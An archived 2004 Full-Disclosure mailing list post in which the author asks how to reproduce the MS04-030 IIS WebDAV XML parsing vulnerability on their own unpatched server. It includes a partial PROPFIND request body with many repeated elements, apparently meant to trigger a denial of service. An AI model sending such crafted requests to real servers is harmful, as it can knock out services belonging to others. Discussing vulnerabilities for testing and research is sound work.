[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details
From: nirvana <karmic_nirvana@xxxxxxxxx>
Date: Wed, 13 Oct 2004 10:10:18 -0700 (PDT)

Hi List,
I've been trying to reproduce this vulnerability
(MS04-030) on my unpatched IIS. I am sending a request
with a element which has multiple/many attributes.
With my limited knowlegde of WebDAV, I think the
attributes per-element can be sent in two ways 
1.in one line, in the element tag only 
2.in multiple per attribute tags.

The request I am sending is something like this (XML
Data only from a PROPFIND Request, with multiple
tags)...

<?xml version="1.0" encoding="utf-8" ?>
<D:propfind xmlns:D="DAV:">
  <D:prop xmlns:ns="DAV:"><ns:displayname/>
    <ns:displayname>
    <attrib1>a</attrib1>
    <attrib1>a</attrib1>
.
.
.
.
    <attrib1>a</attrib1>
  </ns:displayname>
  </D:prop>
</D:propfind>



Plz feel free to rant me if I doin wrong :).

Thanks.






                
__________________________________
Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard.
http://promotions.yahoo.com/new_mail 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details
  - From: nirvana

References:
- [Full-Disclosure] Some presentations from IT-UNDERGROUND conference
  - From: Dave Aitel

Prev by Date: [Full-Disclosure] Nessus experience
Next by Date: [Full-Disclosure] Multiple Cross Site Scripting Vulnerabilities in FuseTalk
Previous by thread: [Full-Disclosure] Some presentations from IT-UNDERGROUND conference
Next by thread: Re: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details
Index(es):
- Date
- Thread